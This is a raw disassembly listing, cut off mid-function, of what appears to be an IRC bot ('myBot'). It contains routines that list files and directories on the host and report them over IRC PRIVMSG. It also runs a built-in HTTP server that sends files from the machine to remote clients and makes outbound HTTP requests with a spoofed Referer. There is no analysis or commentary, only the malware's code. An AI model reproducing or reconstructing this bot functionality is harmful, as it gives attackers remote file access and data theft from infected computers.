; sub_404849+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call dword_422054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call dword_422050 ; FindNextFileA
test eax, eax
jz loc_404E9F
mov ebx, 1FFh
loc_404A9E: ; CODE XREF: sub_404849+650�j
cmp [ebp+var_38C], 0
jz loc_404E87
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404E87
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404E87
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call dword_422068 ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call dword_422064 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_404B9C
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_404B15: ; CODE XREF: sub_404849+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_416975
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_404CEB
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_404BA7
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_416BCD
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_416BCD
add esp, 28h
jmp loc_404E53
; ---------------------------------------------------------------------------
loc_404B9C: ; CODE XREF: sub_404849+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_404B15
; ---------------------------------------------------------------------------
loc_404BA7: ; CODE XREF: sub_404849+308�j
cmp [ebp+arg_C], edi
jz loc_404CA5
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_404BD3: ; CODE XREF: sub_404849+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404BD3
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_2 ; "%s%s/"
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_404C16: ; CODE XREF: sub_404849+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404C16
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404C3A: ; CODE XREF: sub_404849+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404C3A
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404C5C
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_404C61
; ---------------------------------------------------------------------------
loc_404C5C: ; CODE XREF: sub_404849+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_404C61: ; CODE XREF: sub_404849+411�j
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_404C74: ; CODE XREF: sub_404849+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404C74
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_404E44
; ---------------------------------------------------------------------------
loc_404CA5: ; CODE XREF: sub_404849+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_416BCD
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_404CD2: ; CODE XREF: sub_404849+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_416BCD
add esp, 24h
jmp loc_404E53
; ---------------------------------------------------------------------------
loc_404CEB: ; CODE XREF: sub_404849+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_404D15
push edi
push [ebp+var_36C]
call sub_4031A4
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_404CD2
; ---------------------------------------------------------------------------
loc_404D15: ; CODE XREF: sub_404849+4A8�j
cmp [ebp+arg_C], edi
jz loc_404E29
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_404D41: ; CODE XREF: sub_404849+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404D41
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_404D84: ; CODE XREF: sub_404849+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404D84
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404DA8: ; CODE XREF: sub_404849+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404DA8
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404DCA
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_404DCF
; ---------------------------------------------------------------------------
loc_404DCA: ; CODE XREF: sub_404849+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_404DCF: ; CODE XREF: sub_404849+57F�j
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_404DE2: ; CODE XREF: sub_404849+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404DE2
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_416BCD
add esp, 1Ch
jmp short loc_404E53
; ---------------------------------------------------------------------------
loc_404E29: ; CODE XREF: sub_404849+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_404E44: ; CODE XREF: sub_404849+457�j
lea eax, [ebp+var_24C]
push eax
call sub_416BCD
add esp, 18h
loc_404E53: ; CODE XREF: sub_404849+34E�j
; sub_404849+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404E5C: ; CODE XREF: sub_404849+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404E5C
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
cmp [ebp+arg_8], edi
jz short loc_404E87
push 0FAh
call dword_422000 ; Sleep
loc_404E87: ; CODE XREF: sub_404849+25C�j
; sub_404849+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call dword_422050 ; FindNextFileA
test eax, eax
jnz loc_404A9E
loc_404E9F: ; CODE XREF: sub_404849+24A�j
push [ebp+var_C]
call dword_42204C ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_404EE4
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_4031A4
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_4031A4
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_416975
add esp, 14h
jmp short loc_404F12
; ---------------------------------------------------------------------------
loc_404EE4: ; CODE XREF: sub_404849+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_404EFE
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_404F12
; ---------------------------------------------------------------------------
loc_404EFE: ; CODE XREF: sub_404849+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_416975
add esp, 10h
loc_404F12: ; CODE XREF: sub_404849+699�j
; sub_404849+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404F1B: ; CODE XREF: sub_404849+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404F1B
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43A458 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404849 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F3D proc near ; CODE XREF: sub_405163+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call dword_422034 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404FFA
push esi
push ebx
call dword_422094 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_404FF3
push edi
jmp short loc_404F8B
; ---------------------------------------------------------------------------
loc_404F88: ; CODE XREF: sub_404F3D+B3�j
mov edx, [ebp+var_8]
loc_404F8B: ; CODE XREF: sub_404F3D+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_404FA2
mov [ebp+var_4], edx
loc_404FA2: ; CODE XREF: sub_404F3D+60�j
push 2
push esi
neg edx
push edx
push ebx
call dword_422090 ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call dword_42208C ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_43A458 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404FED
call dword_43A47C ; WSAGetLastError
cmp eax, 2733h
jnz short loc_404FF2
xor eax, eax
loc_404FED: ; CODE XREF: sub_404F3D+9F�j
sub [ebp+var_8], eax
jnz short loc_404F88
loc_404FF2: ; CODE XREF: sub_404F3D+AC�j
pop edi
loc_404FF3: ; CODE XREF: sub_404F3D+46�j
push ebx
call dword_42202C ; CloseHandle
loc_404FFA: ; CODE XREF: sub_404F3D+31�j
pop esi
pop ebx
leave
retn
sub_404F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FFE proc near ; CODE XREF: sub_4052D1+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_40500D: ; CODE XREF: sub_404FFE+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_40500D
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_405038
loc_40501B: ; CODE XREF: sub_404FFE+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_405025
mov byte ptr [esi+eax], 2Fh
loc_405025: ; CODE XREF: sub_404FFE+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_40502B: ; CODE XREF: sub_404FFE+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_40502B
sub ecx, edx
cmp esi, ecx
jb short loc_40501B
loc_405038: ; CODE XREF: sub_404FFE+1B�j
pop esi
pop ebx
pop ebp
retn
sub_404FFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40503C proc near ; CODE XREF: sub_409848+581E�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_43A3CC ; WSAStartup
push 6
push 1
push 2
call dword_43A3BC ; socket
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_43A514 ; ntohs
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_40877E
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_43A36C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40511C
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_4050AF
mov eax, (offset asc_422B00+2)
loc_4050AF: ; CODE XREF: sub_40503C+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_416BCD
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_4050DE: ; CODE XREF: sub_40503C+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4050DE
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_43A458 ; send
push 40h
pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_43A324 ; recv
pop esi
pop ebx
loc_40511C: ; CODE XREF: sub_40503C+65�j
push [ebp+var_4]
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_416975
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_405161
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
add esp, 14h
locret_405161: ; CODE XREF: sub_40503C+109�j
leave
retn
sub_40503C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_405163 proc near ; DATA XREF: sub_4052D1+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_416B90
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_416975
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_416975
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_4051CB
push offset aTextHtml ; "text/html"
jmp short loc_4051D0
; ---------------------------------------------------------------------------
loc_4051CB: ; CODE XREF: sub_405163+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_4051D0: ; CODE XREF: sub_405163+66�j
push eax
call sub_416975
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call dword_42209C ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_422098 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_40523D
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416975
add esp, 24h
jmp short loc_405255
; ---------------------------------------------------------------------------
loc_40523D: ; CODE XREF: sub_405163+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_416975
add esp, 28h
loc_405255: ; CODE XREF: sub_405163+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_40525E: ; CODE XREF: sub_405163+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40525E
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_43A458 ; send
cmp [ebp+74h+var_A4], ebx
jnz short loc_405297
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_404F3D
pop ecx
pop ecx
jmp short loc_4052B4
; ---------------------------------------------------------------------------
loc_405297: ; CODE XREF: sub_405163+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_404849
add esp, 10h
loc_4052B4: ; CODE XREF: sub_405163+132�j
push [ebp+74h+var_44C]
call dword_43A4D0 ; closesocket
push [ebp+74h+var_B4]
call sub_4139F6
pop ecx
push ebx
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_405163 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052D1 proc near ; CODE XREF: sub_40558B+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_4052FF
push offset aS_7 ; "\\%s"
jmp short loc_405307
; ---------------------------------------------------------------------------
loc_4052FF: ; CODE XREF: sub_4052D1+25�j
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_405307: ; CODE XREF: sub_4052D1+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_416975
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_405321: ; CODE XREF: sub_4052D1+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405321
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_4053A7
push 2
pop ebx
loc_405332: ; CODE XREF: sub_4052D1+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_40533B: ; CODE XREF: sub_4052D1+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40533B
sub eax, edx
cmp ebx, eax
jnb short loc_405374
cmp [ebp+esi+var_10C], 25h
jnz short loc_405374
cmp [ebp+esi+var_10B], 32h
jnz short loc_405374
cmp [ebp+esi+var_10A], 30h
jnz short loc_405374
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_40538E
; ---------------------------------------------------------------------------
loc_405374: ; CODE XREF: sub_4052D1+75�j
; sub_4052D1+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_405384
push 5Ch
pop eax
jmp short loc_405387
; ---------------------------------------------------------------------------
loc_405384: ; CODE XREF: sub_4052D1+AC�j
movsx eax, al
loc_405387: ; CODE XREF: sub_4052D1+B1�j
mov [ebp+edi+var_210], al
loc_40538E: ; CODE XREF: sub_4052D1+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_40539A: ; CODE XREF: sub_4052D1+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40539A
sub eax, ecx
cmp esi, eax
jb short loc_405332
loc_4053A7: ; CODE XREF: sub_4052D1+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_416975
lea eax, [ebp+var_314]
push offset asc_4236F0 ; "\n"
push eax
call sub_4177E9
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword_4220A0 ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_4053F8
cmp eax, 0FFFFFFFFh
jnz short loc_4053FB
push [ebp+arg_0]
jmp loc_405480
; ---------------------------------------------------------------------------
loc_4053F8: ; CODE XREF: sub_4052D1+118�j
mov [ebp+var_4], ebx
loc_4053FB: ; CODE XREF: sub_4052D1+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_405408
mov [ebp+var_4], ebx
loc_405408: ; CODE XREF: sub_4052D1+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_40548B
cmp [ebp+arg_C], edi
jz short loc_40547F
lea edi, [ebp+var_314]
dec edi
loc_40542A: ; CODE XREF: sub_4052D1+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40542A
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_4239AC ; "*"
push eax
movsw
call sub_416975
lea eax, [ebp+var_210]
push eax
call sub_404FFE
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_416975
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_4054DA
; ---------------------------------------------------------------------------
loc_40547F: ; CODE XREF: sub_4052D1+150�j
push eax
loc_405480: ; CODE XREF: sub_4052D1+122�j
call dword_43A4D0 ; closesocket
jmp loc_405572
; ---------------------------------------------------------------------------
loc_40548B: ; CODE XREF: sub_4052D1+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call dword_422034 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4054DA
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416975
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call dword_422094 ; GetFileSize
push esi
mov [ebp+var_330], eax
call dword_42202C ; CloseHandle
loc_4054DA: ; CODE XREF: sub_4052D1+1AC�j
; sub_4052D1+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_416975
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_413732
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43B264[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_405163
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_405581
push [ebp+arg_0]
call dword_43A4D0 ; closesocket
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_416975
lea eax, [ebp+var_8C4]
push eax
call sub_401F0F
add esp, 10h
loc_405572: ; CODE XREF: sub_4052D1+1B5�j
; sub_4052D1+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405579: ; CODE XREF: sub_4052D1+2B6�j
push 5
call dword_422000 ; Sleep
loc_405581: ; CODE XREF: sub_4052D1+26F�j
cmp [ebp+var_318], edi
jz short loc_405579
jmp short loc_405572
sub_4052D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40558B proc near ; DATA XREF: sub_401141+35A�o
; sub_409848+4A09�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_416B90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_43A514 ; ntohs
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_43A3BC ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_40595E
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_43B26C[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_43A49C ; bind
cmp eax, edi
jz loc_40595E
push 7FFFFFFFh
push ebx
call dword_43A4E8 ; listen
cmp eax, edi
jz loc_40595E
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_43A354 ; ioctlsocket
cmp eax, edi
jz loc_40595E
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_405940
; ---------------------------------------------------------------------------
loc_405670: ; CODE XREF: sub_40558B+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_405675: ; CODE XREF: sub_40558B+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_43A414 ; __WSAFDIsSet
test eax, eax
jz loc_40591D
cmp esi, ebx
jnz short loc_4056F2
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_43A37C ; accept
